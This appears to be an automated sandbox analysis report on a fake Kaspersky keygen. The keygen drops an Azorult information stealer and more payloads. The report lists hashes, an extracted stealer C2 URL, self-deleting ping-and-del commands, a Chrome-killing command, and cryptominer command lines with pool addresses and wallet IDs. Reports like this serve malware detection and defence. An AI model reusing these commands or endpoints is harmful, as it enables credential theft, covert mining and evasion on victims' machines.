Analysis
-
max time kernel
11s -
max time network
61s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 06:46
Static task
static1
Behavioral task
behavioral1
Sample
Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe
Resource
win10v20201028
General
-
Target
Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe
-
Size
5.4MB
-
MD5
71e1b5c96e0b450768b799f4f2ba8c6a
-
SHA1
d974040a5020d4132094f04d42edfb24c28b3c1a
-
SHA256
16bd29c401eabb1c1d158f615fab03d81d6db786d936c4f3d3f929a16162d1c2
-
SHA512
96009bbccfedc418a4ed8a02d19e9c42f90eb6f9827ae0da554e1d8d4a8eb89255e0434eaec0ebf2b72967b52fb604845c85819bf7ccc82ef912edb8dd8cbdfc
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Executes dropped EXE 8 IoCs
pid Process 3100 keygen-pr.exe 4032 keygen-step-1.exe 4088 keygen-step-3.exe 4300 keygen-step-4.exe 984 key.exe 1028 Setup.exe 1780 key.exe 4692 multitimer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 104 api.ipify.org 130 ipinfo.io 135 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 984 set thread context of 1780 984 key.exe 86 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
pid Process 4440 taskkill.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 5444 PING.EXE 4780 PING.EXE 1548 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 140 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 133 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1028 Setup.exe -
Suspicious use of WriteProcessMemory 43 IoCs
description pid Process procid_target PID 4716 wrote to memory of 692 4716 Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe 75 PID 4716 wrote to memory of 692 4716 Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe 75 PID 4716 wrote to memory of 692 4716 Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe 75 PID 692 wrote to memory of 3100 692 cmd.exe 78 PID 692 wrote to memory of 3100 692 cmd.exe 78 PID 692 wrote to memory of 3100 692 cmd.exe 78 PID 692 wrote to memory of 4032 692 cmd.exe 79 PID 692 wrote to memory of 4032 692 cmd.exe 79 PID 692 wrote to memory of 4032 692 cmd.exe 79 PID 692 wrote to memory of 4088 692 cmd.exe 80 PID 692 wrote to memory of 4088 692 cmd.exe 80 PID 692 wrote to memory of 4088 692 cmd.exe 80 PID 692 wrote to memory of 4300 692 cmd.exe 81 PID 692 wrote to memory of 4300 692 cmd.exe 81 PID 692 wrote to memory of 4300 692 cmd.exe 81 PID 3100 wrote to memory of 984 3100 keygen-pr.exe 82 PID 3100 wrote to memory of 984 3100 keygen-pr.exe 82 PID 3100 wrote to memory of 984 3100 keygen-pr.exe 82 PID 4300 wrote to memory of 1028 4300 keygen-step-4.exe 83 PID 4300 wrote to memory of 1028 4300 keygen-step-4.exe 83 PID 4088 wrote to memory of 1404 4088 keygen-step-3.exe 84 PID 4088 wrote to memory of 1404 4088 keygen-step-3.exe 84 PID 4088 wrote to memory of 1404 4088 keygen-step-3.exe 84 PID 1404 wrote to memory of 1548 1404 cmd.exe 87 PID 1404 wrote to memory of 1548 1404 cmd.exe 87 PID 1404 wrote to memory of 1548 1404 cmd.exe 87 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 984 wrote to memory of 1780 984 key.exe 86 PID 1028 wrote to memory of 4692 1028 Setup.exe 91 PID 1028 wrote to memory of 4692 1028 Setup.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Kaspersky_Anti_Virus_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:984 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:1780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4032
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1404 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:1548
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Users\Admin\AppData\Local\Temp\KE0JEYNDKU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KE0JEYNDKU\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:4692 -
C:\Users\Admin\AppData\Local\Temp\KE0JEYNDKU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KE0JEYNDKU\multitimer.exe" 1 3.1617432409.60680f59bb7ef 1016⤵PID:4788
-
C:\Users\Admin\AppData\Local\Temp\KE0JEYNDKU\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KE0JEYNDKU\multitimer.exe" 2 3.1617432409.60680f59bb7ef7⤵PID:3476
-
C:\Users\Admin\AppData\Local\Temp\qjk50alo5ht\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\qjk50alo5ht\KiffApp1.exe"8⤵PID:5764
-
-
C:\Users\Admin\AppData\Local\Temp\yhwk1sacapd\5lr45h52h0c.exe"C:\Users\Admin\AppData\Local\Temp\yhwk1sacapd\5lr45h52h0c.exe" /ustwo INSTALL8⤵PID:5848
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "5lr45h52h0c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\yhwk1sacapd\5lr45h52h0c.exe" & exit9⤵PID:5180
-
-
-
C:\Users\Admin\AppData\Local\Temp\vjfvfqps2ll\vpn.exe"C:\Users\Admin\AppData\Local\Temp\vjfvfqps2ll\vpn.exe" /silent /subid=4828⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\is-J3M13.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-J3M13.tmp\vpn.tmp" /SL5="$30204,15170975,270336,C:\Users\Admin\AppData\Local\Temp\vjfvfqps2ll\vpn.exe" /silent /subid=4829⤵PID:4048
-
-
-
C:\Users\Admin\AppData\Local\Temp\hnzzlqa3c5h\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\hnzzlqa3c5h\Setup3310.exe" /Verysilent /subid=5778⤵PID:5928
-
C:\Users\Admin\AppData\Local\Temp\is-N0ULJ.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-N0ULJ.tmp\Setup3310.tmp" /SL5="$501FA,138429,56832,C:\Users\Admin\AppData\Local\Temp\hnzzlqa3c5h\Setup3310.exe" /Verysilent /subid=5779⤵PID:4148
-
C:\Users\Admin\AppData\Local\Temp\is-GGVSF.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GGVSF.tmp\Setup.exe" /Verysilent10⤵PID:5724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2ge5fddo0qk\app.exe"C:\Users\Admin\AppData\Local\Temp\2ge5fddo0qk\app.exe" /8-238⤵PID:5920
-
-
C:\Users\Admin\AppData\Local\Temp\tx2tpshba5c\1oyy4ejl4x5.exe"C:\Users\Admin\AppData\Local\Temp\tx2tpshba5c\1oyy4ejl4x5.exe"8⤵PID:5900
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\tx2tpshba5c\1oyy4ejl4x5.exe"9⤵PID:5536
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2iufdokbyis\xq0m1xkuoid.exe"C:\Users\Admin\AppData\Local\Temp\2iufdokbyis\xq0m1xkuoid.exe" /VERYSILENT8⤵PID:5892
-
C:\Users\Admin\AppData\Local\Temp\is-I44OL.tmp\xq0m1xkuoid.tmp"C:\Users\Admin\AppData\Local\Temp\is-I44OL.tmp\xq0m1xkuoid.tmp" /SL5="$701EE,2592217,780800,C:\Users\Admin\AppData\Local\Temp\2iufdokbyis\xq0m1xkuoid.exe" /VERYSILENT9⤵PID:5160
-
-
-
C:\Users\Admin\AppData\Local\Temp\wkqhbfs0syu\vict.exe"C:\Users\Admin\AppData\Local\Temp\wkqhbfs0syu\vict.exe" /VERYSILENT /id=5358⤵PID:5880
-
C:\Users\Admin\AppData\Local\Temp\is-C8LKV.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-C8LKV.tmp\vict.tmp" /SL5="$50208,870426,780800,C:\Users\Admin\AppData\Local\Temp\wkqhbfs0syu\vict.exe" /VERYSILENT /id=5359⤵PID:788
-
C:\Users\Admin\AppData\Local\Temp\is-KNAJT.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-KNAJT.tmp\win1host.exe" 53510⤵PID:2180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vh13wh1uwjy\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\vh13wh1uwjy\cpyrix.exe" /VERYSILENT8⤵PID:5868
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:5824
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:4860
-
-
-
C:\Users\Admin\AppData\Local\Temp\edqbvposrep\theodcp450h.exe"C:\Users\Admin\AppData\Local\Temp\edqbvposrep\theodcp450h.exe" /quiet SILENT=1 AF=7568⤵PID:2108
-
-
C:\Users\Admin\AppData\Local\Temp\jda1hxpm5sa\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\jda1hxpm5sa\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\is-SEE76.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-SEE76.tmp\IBInstaller_97039.tmp" /SL5="$10478,14574851,721408,C:\Users\Admin\AppData\Local\Temp\jda1hxpm5sa\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5456
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-TICVG.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:5144
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-TICVG.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:2312
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\93D197OQ9U\setups.exe"C:\Users\Admin\AppData\Local\Temp\93D197OQ9U\setups.exe" ll5⤵PID:192
-
C:\Users\Admin\AppData\Local\Temp\is-ADK6R.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-ADK6R.tmp\setups.tmp" /SL5="$C0062,635399,250368,C:\Users\Admin\AppData\Local\Temp\93D197OQ9U\setups.exe" ll6⤵PID:4436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵PID:4388
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:3536
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Full Program Features.exe"4⤵PID:4808
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:3896
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:3968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"4⤵PID:3212
-
C:\Users\Admin\AppData\Roaming\889E.tmp.exe"C:\Users\Admin\AppData\Roaming\889E.tmp.exe"5⤵PID:5396
-
C:\Users\Admin\AppData\Roaming\889E.tmp.exe"C:\Users\Admin\AppData\Roaming\889E.tmp.exe"6⤵PID:5532
-
-
-
C:\Users\Admin\AppData\Roaming\8A45.tmp.exe"C:\Users\Admin\AppData\Roaming\8A45.tmp.exe"5⤵PID:5440
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:5940
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:3948
-
-
-
C:\Users\Admin\AppData\Roaming\8B21.tmp.exe"C:\Users\Admin\AppData\Roaming\8B21.tmp.exe"5⤵PID:5488
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"5⤵PID:5984
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4780
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"4⤵PID:5264
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4408
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4472
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1864
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4656
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:1588